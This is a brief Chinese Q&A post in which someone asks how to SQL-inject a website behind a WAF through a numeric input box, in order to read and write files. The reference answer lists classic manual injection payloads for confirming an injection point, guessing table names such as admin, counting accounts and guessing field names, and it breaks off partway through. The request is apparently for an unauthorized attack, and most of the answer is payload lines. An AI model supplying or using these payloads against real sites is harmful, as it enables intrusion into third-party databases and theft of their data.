关于sql手动注入

Posted 2023-03-16

我想要注入一个网站 URL不能改有狗拦截 只能通过提交数字的提交框渗透 我想要得到里面的一个文件并写入一个文件 我应该怎么做

参考技术A 1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) —判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.